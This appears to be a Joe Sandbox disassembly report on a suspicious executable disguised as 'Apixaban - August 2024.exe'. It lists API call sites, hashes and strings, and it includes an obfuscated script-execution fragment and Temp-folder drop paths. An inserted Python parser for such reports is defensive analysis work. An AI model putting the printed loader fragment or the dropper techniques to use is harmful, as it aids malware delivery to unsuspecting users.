                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                                                • GetDlgItem.USER32(?,00000408), ref: 00404B31
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                                                • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                                                • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                                                • DeleteObject.GDI32(00000000), ref: 00404C04
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                                                • ShowWindow.USER32(?,00000005), ref: 00404D5E
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                                                • GlobalFree.KERNEL32(?), ref: 00404F3E
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
                                                • ShowWindow.USER32(?,00000000), ref: 004050DD
                                                • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                                                • ShowWindow.USER32(00000000), ref: 004050EF
                                                Strings
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404617
                                                • SetWindowTextW.USER32(00000000,?), ref: 00404641
                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                                                • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                                                • lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
                                                • lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                                                  • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061DF
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061F3
                                                  • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00406206
                                                • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                                                • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                                                Strings
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                • String ID: ';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "$: Completed$A$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
                                                APIs
                                                • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren, xrefs: 004020F5
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
                                                • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
                                                • Opcode Fuzzy Hash: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
                                                • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
                                                • GetSysColor.USER32(?), ref: 004043AA
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                                                • lstrlenW.KERNEL32(?), ref: 004043CB
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404446
                                                • SendMessageW.USER32(00000000), ref: 0040444D
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404478
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                                                • SetCursor.USER32(00000000), ref: 004044CC
                                                • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                                                • SetCursor.USER32(00000000), ref: 004044F0
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: : Completed$AB@$N$open
                                                • API String ID: 3615053054-1317861079
                                                • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                                                • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                                                APIs
                                                • lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
                                                • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                                                  • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                  • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                                                • wsprintfA.USER32 ref: 00405C7E
                                                • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                                                • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                                                • CloseHandle.KERNEL32(00000000), ref: 00405D76
                                                  • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                  • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                • API String ID: 1265525490-3322868524
                                                • Opcode ID: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
                                                • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                                                • Opcode Fuzzy Hash: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
                                                • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061DF
                                                • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                • CharNextW.USER32(?,"C:\Users\user\Desktop\Apixaban - August 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 004061F3
                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00406206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\Apixaban - August 2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-1140343847
                                                • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                                                • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
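Every function record in this section has the same shape: a list of call-site lines of the form `Api.MODULE(arg,arg,...), ref: ADDRESS` (with an optional `Part of subcall function XXXXXXXX:` prefix, and no parenthesised list when the arguments were not recovered, as with `wsprintfA.USER32 ref: 00405C7E`), followed by a `String ID` field in which Joe Sandbox joins the function's string literals with `$`. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin. It turns those lines into structured records and derives three behaviour tags from them: the `[Rename]` / `NUL` / `WriteFile` combination of the function at 00405C16 (the tag assumes that pattern is the legacy `wininit.ini` rename-or-delete-on-reboot record, `NUL=<path>` meaning delete), the `ShellExecuteW(...,open,...)` call in the dialog function at 00404368, and the `%Temp%` paths passed to `CharNextW` at 004061DF. The sample text is constructed from abridged lines of those three records; the tag names, the path heuristic and the `ApiCall` / `FunctionBlock` types are my own.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: API-call and String-ID lines copied (abridged) from the
# Joe Sandbox function records above, separated by the report's "APIs" headers.
SAMPLE = """\
APIs
• lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
• GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
  • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
• wsprintfA.USER32 ref: 00405C7E
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
• CloseHandle.KERNEL32(00000000), ref: 00405D76
• String ID: %ls=%ls$NUL$[Rename]$p]B$peB
APIs
• ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
• String ID: : Completed$AB@$N$open
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,"C:\\Users\\user\\Desktop\\Apixaban - August 2024.exe",C:\\Users\\user\\AppData\\Local\\Temp\\,00000000), ref: 004061DF
• String ID: "C:\\Users\\user\\Desktop\\Apixaban - August 2024.exe"$*?|<>/":$C:\\Users\\user\\AppData\\Local\\Temp\\
"""

# One call-site line; the argument list is absent when Joe Sandbox could not recover it.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
STRING_RE = re.compile(r"^•\s*String ID:\s?(?P<s>.*)$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")          # drive-letter path
TEMP_DIR = "\\AppData\\Local\\Temp\\"          # hypothetical heuristic, not from the report


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str                            # address of the call site in the dumped function
    subcall_of: Optional[str] = None    # set when listed as "Part of subcall function"


@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)


def parse_report(text: str) -> list[FunctionBlock]:
    """Split report text into one FunctionBlock per 'APIs' header."""
    blocks: list[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue  # text before the first function record
        if m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif m := STRING_RE.match(line):
            # the report joins a function's string literals with '$'
            current.strings = [s for s in m["s"].split("$") if s]
    return blocks


def api_histogram(blocks: list[FunctionBlock]) -> Counter:
    """Count 'MODULE!Api' call sites across all blocks (subcall lines included)."""
    return Counter(f"{c.module}!{c.api}" for b in blocks for c in b.calls)


def extract_paths(blocks: list[FunctionBlock]) -> set[str]:
    """Collect drive-letter paths from call arguments and string literals."""
    found: set[str] = set()
    for b in blocks:
        for s in [a for c in b.calls for a in c.args] + b.strings:
            s = s.strip('"')
            if PATH_RE.match(s):
                found.add(s)
    return found


def flag_behaviours(blocks: list[FunctionBlock]) -> dict[int, list[str]]:
    """Map block index -> behaviour tags derived from API/string combinations."""
    flags: dict[int, list[str]] = {}
    for i, b in enumerate(blocks):
        tags = []
        apis = {c.api for c in b.calls}
        if any(c.api == "ShellExecuteW" and "open" in c.args for c in b.calls):
            tags.append("shell-execute-open")
        # "[Rename]" section plus "NUL=<path>" entries written to a file is the
        # legacy wininit.ini rename/delete-on-reboot record (assumed interpretation)
        if "[Rename]" in b.strings and "NUL" in b.strings and "WriteFile" in apis:
            tags.append("wininit-rename-record")
        if any(TEMP_DIR in p for p in extract_paths([b])):
            tags.append("references-temp-path")
        if tags:
            flags[i] = tags
    return flags


if __name__ == "__main__":
    blocks = parse_report(SAMPLE)
    for name, n in api_histogram(blocks).most_common():
        print(f"{n:3d}  {name}")
    print("paths:", sorted(extract_paths(blocks)))
    print("flags:", flag_behaviours(blocks))
```

Run over the whole disassembly section of a report, this yields the set of imports the dumped code actually reaches rather than the import table alone. Two caveats: the lines are static call sites from the IDA plugin, so counts are sites, not runtime invocations, and arguments printed as `?` are unresolved, so a path or verb that was only known at runtime will not appear in `extract_paths`.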
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                                                • GetSysColor.USER32(00000000), ref: 004041CD
                                                • SetTextColor.GDI32(?,00000000), ref: 004041D9
                                                • SetBkMode.GDI32(?,?), ref: 004041E5
                                                • GetSysColor.USER32(?), ref: 004041F8
                                                • SetBkColor.GDI32(?,?), ref: 00404208
                                                • DeleteObject.GDI32(?), ref: 00404222
                                                • CreateBrushIndirect.GDI32(?), ref: 0040422C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                                                • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                                                  • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB
